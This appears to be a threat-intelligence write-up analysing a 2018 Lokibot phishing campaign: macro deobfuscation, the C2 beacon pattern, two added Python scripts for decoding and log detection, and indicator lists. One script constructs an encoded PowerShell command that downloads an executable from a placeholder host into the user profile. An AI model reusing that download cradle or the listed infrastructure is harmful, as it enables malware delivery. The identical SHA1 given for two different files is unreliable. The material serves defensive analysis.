Between February 14 and February 16, 2018, NTT Security clients began observing emails carrying file attachments with the naming convention ‘CALIS PO [0-9]{6}.XLS’. The Excel attachments contained malicious macros which then installed Lokibot, an information-stealing malware commonly sold on Russian underground forums.


Stage 1: Phishing Email


The phishing emails used in this campaign came from admin@dealer[.]com, delivering Excel files with the file naming convention ‘CALIS PO [0-9]{6}.XLS’. In this analysis, we examine a phishing attempt sent from 159.89.162[.]58. Table 1 details the file characteristics of the Excel attachment.


Stage 2: Malware Install via Macro


Typically, phishing attacks use Microsoft Office documents containing malicious Visual Basic for Applications (VBA) macros, Object Linking and Embedding (OLE) streams, and/or Dynamic Data Exchange (DDE) fields to install the first-stage malware. Using oledump, a popular analysis tool for phishing documents, GTIC determined that several macros existed. Based on size and name, GTIC started analysis with ‘_VBA_PROJECT_CUR/VBA/AjSKhwXEZKaDCNlf’, as shown in the oledump results below.

Figure 1: oledump results on the Excel phishing document (662ab84c754f4a74cb74a965fa719df8).

After extracting the VBA macro, a brief static analysis showed that the macro used obfuscation to make analysis difficult. At a glance, several procedures contained calls to the following functions:

CreateObject('WsCRiPt.shELL') - Used from VBA/VBScript to run commands through the native command line

createElement('AUMLfTIlsL') - Creates a new element node

qUTAkhttxBskryuWcZnJTaXhTwetsBulFcuhrzQavsvzObxtUjHjDn('UuGKQ') - Primary function


Figure 2: This image shows a portion of the VBA macro with several parts of a larger base64-encoded string.

Using ViperMonkey, a VBA parsing and emulation tool by Philippe Lagadec at Decalage.info, GTIC was able to decode the obfuscated strings and learn more about the macro itself.

Throughout the macro, a variable named ‘UuGKQ’ is used to store several different strings which are concatenated into one large base64 string, as shown below. This string is then passed to the qUTAkhttxBskryuWcZnJTaXhTwetsBulFcuhrzQavsvzObxtUjHjDn() function, where it is decoded.


Figure 3: This image shows parts of base64 strings being concatenated throughout the VBA macro to build one large base64 string.

The decoded form of this base64 string becomes the parameters for a ‘WsCRiPt.shELL’ object, which relies on PowerShell (PS) and another base64 string. Decoded, this second base64 string is a PS script that uses the Net.WebClient class to download malware from hxxps://comfy[.]moe/uuoovq.jpg onto the victim’s machine, directly into $env:USERPROFILE, with the filename ‘ubPDnILodwXSQYiPXec.exe’.

Figure 4: This image shows the command used by this VBA macro to download the malware.
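The two-layer encoding described above (string chunks concatenated into one base64 blob, which decodes to a PowerShell command carrying a second, UTF-16LE base64 payload) is something an analyst can peel apart without executing the macro. The following Python script is an added example and is not code from the NTT Security write-up or from the tools it mentions: it builds a constructed macro body in the same style (the variable name ‘UuGKQ’ and the concatenation pattern follow the post; the URL, filename and PowerShell switches are placeholders chosen for the demo), then recovers the download URL from it. The ‘-EncodedCommand’ handling is the generalization: any `-enc`/`-e` style switch is decoded as UTF-16LE, which is how PowerShell reads that argument.

```python
"""
Added example: statically unwrap a VBA macro that assembles a base64 string
piece by piece, then decode the PowerShell -EncodedCommand payload inside it.
Everything below is constructed for the demo; no live host is contacted.
"""
import base64
import re

# Placeholders (constructed, not the campaign's real values).
PLACEHOLDER_URL = "hxxps://example[.]invalid/uuoovq.jpg"
PLACEHOLDER_EXE = "ubPDnILodwXSQYiPXec.exe"
MACRO_VAR = "UuGKQ"  # accumulator variable name taken from the post


def build_sample_macro(url: str, exe: str, var: str = MACRO_VAR) -> str:
    """Construct a macro body in the style the post describes (demo input only)."""
    ps_script = ("(New-Object Net.WebClient).DownloadFile("
                 f"'{url}', \"$env:USERPROFILE\\{exe}\")")
    # PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text.
    encoded_ps = base64.b64encode(ps_script.encode("utf-16le")).decode()
    command = f"powershell -NoP -W Hidden -EncodedCommand {encoded_ps}"
    outer = base64.b64encode(command.encode()).decode()
    # Split the outer blob into 24-character chunks, first assigned, rest appended.
    chunks = [outer[i:i + 24] for i in range(0, len(outer), 24)]
    lines = [f'{var} = "{chunks[0]}"']
    lines += [f'{var} = {var} & "{c}"' for c in chunks[1:]]
    lines.append(f"Call qUTAkhttxBskryuWcZnJTaXhTwetsBulFcuhrzQavsvzObxtUjHjDn({var})")
    return "\n".join(lines)


def collect_chunks(macro: str, var: str = MACRO_VAR) -> str:
    """Concatenate every string literal assigned or appended to `var`, in source order."""
    pattern = re.compile(
        rf'^\s*{re.escape(var)}\s*=\s*(?:{re.escape(var)}\s*&\s*)?"([^"]*)"', re.M)
    return "".join(m.group(1) for m in pattern.finditer(macro))


def decode_outer(b64: str) -> str:
    """First layer: plain base64 of the WScript.Shell command line."""
    return base64.b64decode(b64).decode("utf-8", errors="replace")


def decode_encoded_command(command: str):
    """Second layer: the -EncodedCommand argument is base64 of UTF-16LE text."""
    m = re.search(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", command, re.I)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")


def extract_indicators(macro: str, var: str = MACRO_VAR) -> dict:
    """Return the recovered command, script and any URLs it references."""
    command = decode_outer(collect_chunks(macro, var))
    script = decode_encoded_command(command) or command
    urls = re.findall(r"(?:hxxps?|https?)://[^\s'\"]+", script)
    return {
        "command": command,
        "script": script,
        "urls": urls,
        "uses_webclient": "net.webclient" in script.lower(),
    }


if __name__ == "__main__":
    sample = build_sample_macro(PLACEHOLDER_URL, PLACEHOLDER_EXE)
    result = extract_indicators(sample)
    print("command :", result["command"][:60] + "...")
    print("script  :", result["script"])
    print("urls    :", result["urls"])
```

On a real sample the first step is to pull the macro text with oledump (`oledump.py -s <stream> -v`) and feed that text to `extract_indicators`; the chunk regex assumes the literals are appended with `&` to a single variable, so a macro that routes chunks through helper functions would need the pattern widened, which is exactly where ViperMonkey's emulation earns its keep.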


Stage 3: Lokibot Setup and C2 Communication

Upon execution, callbacks to the command and control (C2) host at speedneedoxyz[.]xyz/calis/fre.php occur, as shown in the network traffic capture below. This request reports a new infection and any private data stolen during the process. Based on the user-agent (HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno)) and the URI, GTIC confidently determined this malware to be Lokibot.

Figure 5: This image shows network traffic from Lokibot to the C2 server at speedneedoxyz[.]xyz.

Lokibot is commodity malware sold on underground sites and used to steal private data. It is commonly distributed via phishing attacks leveraging file attachments with malicious macros and OLE objects. As shown in Figure 5, Lokibot will commonly make C2 calls to a ‘fre.php’ file, which records the infection and any stolen information. This phishing process is very straight to the point, but effective.
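The beacon characteristics called out above (an HTTP/1.0 POST to a ‘fre.php’ path with the user-agent ‘Mozilla/4.08 (Charon; Inferno)’) are cheap to hunt for in proxy or web-gateway logs. The script below is an added example, not code from the NTT Security write-up; the log lines are constructed for the demo in a simplified one-line-per-request format (the C2 domain is the post's defanged value, every other host is a placeholder), and the scoring thresholds are assumptions. It separates the high-confidence match on the user-agent string from the weaker path-only match, because a ‘fre.php’ on an internal web application is not by itself evidence of Lokibot.

```python
"""
Added example: flag Lokibot-style C2 beacons in proxy logs.
Log format (constructed for the demo):
  client_ip method host uri proto "user-agent"
"""
import re
from collections import Counter

# Constructed sample log; not a real capture. Hosts other than the post's
# defanged C2 domain are placeholders.
SAMPLE_LOG = """\
10.0.0.15 POST speedneedoxyz[.]xyz /calis/fre.php HTTP/1.0 "Mozilla/4.08 (Charon; Inferno)"
10.0.0.22 GET www.example.com /index.html HTTP/1.1 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
10.0.0.15 POST speedneedoxyz[.]xyz /calis/fre.php HTTP/1.0 "Mozilla/4.08 (Charon; Inferno)"
10.0.0.31 POST intranet.example.com /upload/fre.php HTTP/1.1 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
10.0.0.40 GET cdn.example.net /app.js HTTP/1.1 "curl/7.68.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<method>\S+) (?P<host>\S+) (?P<uri>\S+) (?P<proto>\S+) "(?P<ua>[^"]*)"$'
)

# Indicators from the post.
LOKIBOT_UA = "Mozilla/4.08 (Charon; Inferno)"
LOKIBOT_PATH_SUFFIX = "/fre.php"


def score(rec: dict) -> list:
    """Return the list of indicator names that match one parsed request."""
    reasons = []
    if rec["ua"] == LOKIBOT_UA:
        reasons.append("lokibot-user-agent")
    if rec["method"] == "POST" and rec["uri"].lower().endswith(LOKIBOT_PATH_SUFFIX):
        reasons.append("post-to-fre.php")
    if rec["method"] == "POST" and rec["proto"] == "HTTP/1.0":
        # Modern browsers do not POST over HTTP/1.0; weak on its own.
        reasons.append("http1.0-post")
    return reasons


def detect(log_text: str) -> list:
    """Parse each line and keep the ones with at least one indicator match."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; skip rather than crash the sweep
        rec = m.groupdict()
        reasons = score(rec)
        if reasons:
            # The user-agent is the discriminating indicator; path alone is weak.
            confidence = "high" if "lokibot-user-agent" in reasons else "low"
            hits.append({**rec, "reasons": reasons, "confidence": confidence})
    return hits


def summarize(hits: list) -> Counter:
    """Count high-confidence beacons per (client, C2 host) pair for triage."""
    return Counter((h["ip"], h["host"]) for h in hits if h["confidence"] == "high")


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for h in found:
        print(h["confidence"], h["ip"], h["host"], h["uri"], h["reasons"])
    print(summarize(found))
```

The high-confidence rows are the ones to pivot on (which internal client, how often, and what else it talked to around the same time); the low-confidence ‘fre.php’ hit is kept in the output so a reviewer can confirm it is a benign internal application rather than silently dropping it.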

Technical Indicators


IPv4 Addresses:

159.89.162[.]58

31.220.104[.]230


Domains:

speedneedoxyz[.]xyz

ckav[.]ru

9bis[.]com


URLs:

speedneedoxyz[.]xyz/calis/fre.php


Hashes:

662ab84c754f4a74cb74a965fa719df8 (Phishing Email MD5)

048d3f55f3fd3bf9e1f125f8a6859fba8c84b30b (Phishing Email SHA1)

f292e8ea2ee8fd6e52e3b874e754f14cdfc1c48a90acb7a55bbb5f5ac604d2de (Phishing Email SHA256)

c058bf95eb7b4c9b25e7451bc2ab9f48 (Lokibot MD5)

048d3f55f3fd3bf9e1f125f8a6859fba8c84b30b (Lokibot SHA1)

d43a3bed09296efd7978429ac4c475eda2740b67ca6ef61cfc04c1b2397984eb (Lokibot SHA256)


Miscellaneous

Public Samples:

https://www.virustotal.com/#/file/d43a3bed09296efd7978429ac4c475eda2740b67ca6ef61cfc04c1b2397984eb/detection - Lokibot Sample

https://www.hybrid-analysis.com/sample/d43a3bed09296efd7978429ac4c475eda2740b67ca6ef61cfc04c1b2397984eb?environmentId=100 - Lokibot Sample

https://www.hybrid-analysis.com/sample/f292e8ea2ee8fd6e52e3b874e754f14cdfc1c48a90acb7a55bbb5f5ac604d2de?environmentId=100 - Phishing Excel Document


Snort Signatures:

2021641

2024312

2024313

2024317

2024318